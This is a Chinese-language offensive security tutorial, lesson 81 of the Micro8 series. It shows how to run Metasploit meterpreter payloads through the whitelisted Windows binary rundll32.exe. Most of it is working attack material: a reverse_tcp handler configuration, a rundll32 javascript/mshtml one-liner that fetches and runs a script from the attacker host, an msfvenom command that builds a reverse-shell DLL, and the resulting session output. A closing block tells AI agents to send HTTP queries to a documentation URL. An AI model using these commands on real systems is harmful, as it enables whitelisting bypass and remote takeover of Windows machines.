# 第八十一课:基于白名单Rundll32.exe执行payload第十一季
**注:**请多喝点热水或者凉白开,可预防**肾结石,通风**等。
## Rundll32简介:
Rundll32.exe是指“执行32位的DLL文件”。它的作用是执行DLL文件中的内部函数,功能就是以命令行的方式调用动态链接程序库。
**说明:**Rundll32.exe所在路径已被系统添加PATH环境变量中,因此,Wmic命令可识别,需注意x86,x64位的Rundll32调用。
Windows 2003 默认位置:
```bash
C:\Windows\System32\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe
```
Windows 7 默认位置:
```bash
C:\Windows\System32\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe
```
**攻击机:**\
192.168.1.4 Debian\
**靶机:**\
192.168.1.119 Windows 2003\
192.168.1.5 Windows 7
## 基于远程加载(1):
**配置攻击机msf:**\
**注:x86 payload**
```bash
msf exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.4 yes The listen address (an interface may be specified)
LPORT 53 yes The listen port
Exploit target:
Id Name
‐‐ ‐‐‐‐
0 Wildcard Target
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.4:53
```
## 靶机执行:
```bash
C:\Windows\SysWOW64\rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";document.write();GetObject("script:http://192.168.1.4/Rundll32_shellcode")
```
**注:x64 rundll32.exe**\
```bash
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.4:53
[*] Sending stage (179779 bytes) to 192.168.1.5
[*] Meterpreter session 57 opened (192.168.1.4:53 ‐> 192.168.1.5:41274)
at 2019‐01‐19 04:13:26 ‐0500
meterpreter > getuid
Server username: John‐PC\John
meterpreter > getpid
Current pid: 7064
meterpreter >
```
## 基于本地加载(2):
**payload配置:**
```bash
msfvenom ‐a x86 ‐‐platform windows ‐p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=53 ‐f dll > Micropoor_Rundll32.dll
```
**靶机执行:**\
```bash
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.4:53
[*] Sending stage (179779 bytes) to 192.168.1.5
[*] Meterpreter session 63 opened (192.168.1.4:53 ‐> 192.168.1.5:43320)
at 2019‐01‐19 04:34:59 ‐0500
meterpreter > getuid
Server username: John‐PC\John
meterpreter > getpid
Current pid: 6656
```
## 基于命令执行(3):
**靶机执行:**
**Windows 2003:**
```bash
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new ActiveXObject(\"WScript.Shell\");w.run(\"mstsc\");window.close()");
```
注:如靶机支持powershell,调用powershell更贴合实战。
## 附录:Rundll32\_shellcode
```bash
```
> Micropoor
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://micro8.gitbook.io/micro8/contents-1/81-90/81-ji-yu-bai-ming-dan-rundll32.exe-zhi-hang-payload-di-shi-yi-ji.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.